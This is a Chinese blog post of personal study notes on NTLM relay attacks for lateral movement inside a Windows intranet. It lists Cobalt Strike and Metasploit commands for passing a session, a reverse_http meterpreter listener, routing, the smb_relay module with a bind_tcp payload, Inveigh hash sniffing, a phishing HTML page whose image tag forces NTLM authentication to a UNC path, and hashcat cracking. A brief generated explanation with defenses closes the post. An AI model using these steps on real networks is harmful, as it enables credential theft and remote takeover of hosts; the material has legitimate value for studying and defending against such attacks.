11、内网安全-横向移动&NTLM-Relay重放&Responder中继攻击&Ldap&Ews

本文详细描述了如何通过NTLM中继攻击进行SMB权限提升,包括MSF工具的使用,如CS权限转移至MSF,利用smb_relay模块进行重发攻击,以及Inveigh嗅探和Hash破解的过程。
摘要由CSDN通过智能技术生成

用途:个人学习笔记,有所借鉴,欢迎指正!

目录

前提知识:

一、横向移动-NTLM 中继攻击-Relay 重放-SMB 上线

1、CS权限转给MSF:

2、MSF:

3、添加路由:

4、smb_relay重发模块:

5、受控主机输入命令:dir \\192.168.46.166\c$

二、横向移动-NTLM中继攻击-Inveigh嗅探-Hash破解

1、监听拦截

2、触发拦截 

 2.1、钓鱼触发

 3、破解密文


前提知识:

CS上线后,system高权限用户切换至低权限用户

ps命令   查看所需用户权限的进程号
steal_token 1668  切换至进程号为1668的用户权限

MSF上线后, 高权限用户切换低权限用户

migrate 1992    #1992是PID号,所需用户权限的PID

dir命令理解

一、横向移动-NTLM 中继攻击-Relay 重放-SMB 上线

192.168.46.166  kali  取得内网webserver权限建立路由能访问3网段

让内网中一台主机上线后,输入命令:dir \\192.168.46.166\c$,kali(192.168.46.166) msf的smb_relay模块做了一个转发攻击,即中继攻击,转发至192.168.3.32,最终使192.168.3.32上线到MSF。

条件:两台主机用户密码一致

1、CS权限转给MSF:

spawn l-msf

2、MSF:

监听上线:
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 0.0.0.0
set lport 8888
run

3、添加路由:

run autoroute -p    //查看当前路由表
run post/multi/manage/autoroute    //添加当前路由表
backgroup   //返回

4、smb_relay重发模块:

use exploit/windows/smb/smb_relay
set smbhost 192.168.3.32   //转发攻击目标
set lhost 192.168.46.166    //设置本地 IP
set autorunscript post/windows/manage/migrate

主动连接:
set payload windows/meterpreter/bind_tcp
set rhost 192.168.3.32
run 

5、受控主机输入命令:dir \\192.168.46.166\c$

由于kali(192.168.46.166)的smb_relay重发模块做了中继攻击,使得主机192.168.3.32上线到kali MSF

二、横向移动-NTLM中继攻击-Inveigh嗅探-Hash破解

条件:被控主机当前管理员权限
Responder中继攻击-NTLM Hash破解
https://github.com/hashcat/hashcat/
https://github.com/Kevin-Robertson/Inveigh

1、监听拦截

 Inveigh.exe

2、触发拦截 

dir \\192.168.3.x\c$
 2.1、钓鱼触发

http://192.168.3.31/1.html

<!DOCTYPE html>
<html>
<head>
  <title></title>
</head>
<body>
  <img src="file:///\\192.168.3.32\2">
</body>
</html>

 3、破解密文

 hashcat -m 5600 hash pass.txt --show
  • 14
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
NTLM Relay 是一种攻击技术,利用了 NTLM(Windows 网络身份验证协议)的漏洞。该攻击允许黑客在网络中伪装成受害者与服务器进行通信,从而获取敏感信息或执行一些恶意操作。 NTLM Relay 攻击的原理如下: 1. 受害计算机通过 NTLM 协议与服务器进行身份验证。在此过程中,受害计算机和服务器之间会进行一系列的挑战-响应验证,包括凭据传递和会话密钥生成。 2. 黑客在网络中进行监听,并截获受害计算机与服务器之间的 NTLM 通信数据。这可以通过中间人攻击或通过 ARP 欺骗攻击完成。 3. 黑客将截获的 NTLM 通信数据传输给目标服务器,冒充受害者的身份与服务器进行通信。 4. 目标服务器接收到黑客发送的伪造的验证请求并验证其身份。由于黑客已经截获到了真实的 NTLM 通信数据,因此服务器会认为该请求来自于受害者。 5. 服务器将响应返回给黑客,并黑客将该响应转发给受害计算机。 6. 受害计算机将响应解密并发送给黑客。 通过 NTLM Relay 攻击,黑客可以实施多种恶意操作,例如获取受害者的用户名和密码、执行远程命令、篡改数据等。这种攻击技术在企业中尤其危险,因为它可能导致黑客获取管理员权限并在网络中横向移动,进一步危害整个系统的安全。 为了防止 NTLM Relay 攻击,企业应采取以下措施:禁用 NTLM 认证、启用 Kerberos 认证、使用防火墙限制对 NTLM 端口的访问、使用多因素身份验证、及时修补操作系统中的漏洞并使用最新版本的软件。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

++⁠⁠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值